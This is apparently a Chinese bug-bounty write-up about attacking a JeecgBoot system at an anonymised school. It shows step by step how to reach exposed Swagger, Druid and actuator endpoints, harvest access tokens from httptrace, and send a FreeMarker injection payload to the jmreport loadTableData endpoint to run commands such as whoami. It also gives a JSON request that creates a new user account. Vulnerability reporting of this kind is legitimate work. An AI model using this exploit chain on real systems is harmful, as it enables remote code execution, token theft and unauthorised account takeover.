Featured image of post 【SRC】jeecg框架-导致敏感信息泄露

【SRC】jeecg框架-导致敏感信息泄露

文章共567字

案例:xxx实验小学

特定目录访问swagger
image.png

目录一

1:输入手机号和密码(随意输),然后抓包
image.png
2:复制host界面,访问web信息
image.png
3:然后拼接jeecg的目录接口,/jeecg-boot/v2/api-docs?group=后台接口
Jeecg-boot/druid/login.html
image.png
image.png
image.png

目录二:

1:在jeecg-boot后面接上actuator,获得后续的大量接口
image.png
2:将第一个案例中的/jeecg-boot/v2/api-docs粘贴bp中,发包,选择一个特定接口
image.png

1
/jeecg-boot/sys/formFile/add

3:将get请求方式改为post请求方式,然后把content-type的格式改为json
image.png
4:使用jeecg-boot/actuator/httptrace获得access-token
(会保留一些用户登录的token信息)
image.png
5:将token输入swagger的接口中成功访问,比如打jeecg的rce接口:
将下面的请求参数也一并复制的数据包里面(post)

1
2
3
{"dbsource":"","sql":"select '<#assign value=\"freemarker.template.utility.Execute\"?

new()>${value(\"echo 123k1msns\")}'","tableName":"test_demo);""pageNo":1,"pagesize":10}

image.png
Jeecg-boot/jmreport/loadTableData
image.png
放到最后
image.png
6:输入指令比如whoami
image.png
image.png
7:又或者下面的接口/jeecg-boot/sys/role/list,也只有获得了Access-Token才可以成功访问
image.png
8:访问后获得普通教师的id,使用添加用户的接口添加user用户
接口: /server/sys/user/add
image.png

1
2
3
4
5
6
7
8
9
{
 "selectedroles":"1680133311360319489",
 "createBy":"admin",
 "userIdentity":"1",
 "username":"test12345",
 "password":"test12345",
 "confirmpassword":"test12345",
 "realname":"test12345"
}

9:修改用户名和密码,发包,添加成功
image.png
10:在登录界面输入用户名和密码,登录成功
image.png

站点已运行计算中...